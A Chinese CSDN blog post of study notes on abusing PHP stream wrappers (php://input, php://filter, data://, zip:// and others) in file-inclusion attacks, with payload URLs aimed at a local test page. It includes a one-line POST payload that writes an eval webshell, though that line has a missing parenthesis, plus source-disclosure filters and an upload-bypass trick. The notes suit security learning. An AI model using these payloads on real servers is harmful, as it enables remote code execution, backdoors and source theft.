PHP伪协议学习

已于 2024-04-06 18:50:13 修改
阅读量668 收藏 17
点赞数 25
文章标签: php 学习 开发语言
于 2024-04-06 15:27:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73927535/article/details/137427269
版权

主要学习file://、php://input、php://filter、data://、zip://, bzip2://, zlib://几个伪协议。

要成功应用伪协议需要php.ini文件的

allow_url_fopen默认开启 (on)       

allow_url_include默认关闭(off)

一、file://

此协议可以在双off的情况下也可以使用,用于访问本地文件。

使用方法:

file://[文件的绝对路径和文件名] 

如http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt

二、php://input

此协议需要allow_url_include为on,将post请求中的数据作为PHP代码执行。

使用方法:

php://input        然后post需要执行的数据

如在hackbar中提交post数据:http://127.0.0.1/cmd.php?file=php://input    然后在post中<?php phpinfo() ?>

burpsuite提交

也可以POST如下内容生成一句话木马:

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>

 三、php://filter

在双off的情况下也可使用,读取文件并进行显示或写入。读取源代码时可以进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

使用方法:

php://filter/read=convert.base64-encode/resource=文件名(对文件进行base64编码并读取显示) 

如http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

四、data://text/plain

此协议需要在双on的情况下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入。

使用方法有4种:

data://text/plain,【字符】

data://text/plain;base64,【base64编码字符】 

data:text/plain,【字符】

data:text/plain;base64,【base64编码字符】 

如http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>

http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

五、zip://, bzip2://, zlib://

zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

 使用方法:

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

如http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt

先将要执行的PHP代码写好文件名为phpcode.txt(存储在本机上),将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。

compress.bzip2://

如http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg

compress.zlib://[文件路径和文件名]

如http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg

m0_73927535
关注
PHP伪协议
qq_37466661的博客
08-06 6359
PHP伪协议
php 伪协议
热门推荐
Ni9htMar3的博客
04-09 2万+
php 伪协议 php:// php://filter
PHP伪协议学习总结
不想当脚本小子的脚本小子
12-01 554
今天工作中遇到了一个利于curl来伪装POST传参的方法(这里给大家一个思路,当你觉得利用get传参行不通的时候,不妨试试post传参),其中用到了php伪协议,我对这一块不太了解,只是在学习文件包含漏洞的时候用到了file://这种本地文件包含,在这里我打算系统的学习并且总结一下,也方便了自己日后复习。 首先,php伪协议有以下几种(我觉得很多东西是要记在脑子里的): file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s...
什么是php伪协议,并举例说明
02-25
学习PHP伪协议时,需要注意以下几点: 1. 伪协议的安全性:确保在使用自定义伪协议时,正确处理潜在的安全风险,如输入验证和权限控制。 2. 性能优化:虽然伪协议提供了便利,但过度使用可能会影响程序性能,尤其...
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议是漏洞吗(2)
最新发布
2401_84297193的博客
05-02 34
通过在url后面添加了伪协议读取方式,我们就将它的源码以base64的编码格式读取出来了,通过这个例子,我们通过php://filter伪协议将服务器中的flag.php文件源码读取出来了,说明这个伪协议可能造成源码或者服务器敏感信息泄露。PHP这门语言,凭借其上手快,轻量级,以往在建站的时候被广泛使用,现实使用较少了,虽然使用少了但我们还是要对其存在的漏洞有所了解,掌握其中原理,以及了解其漏洞的基本利用方法。题目给了提示,文件包含,所以这个p盲猜是include内的参数,所以直接输入flag试试。
PHP伪协议详解
m0_67401228的博客
08-02 1449
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
php伪协议
qq_41788704的博客
10-10 1985
php://input 利用条件 allow_url_include = On 接受 POST 数据 php
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值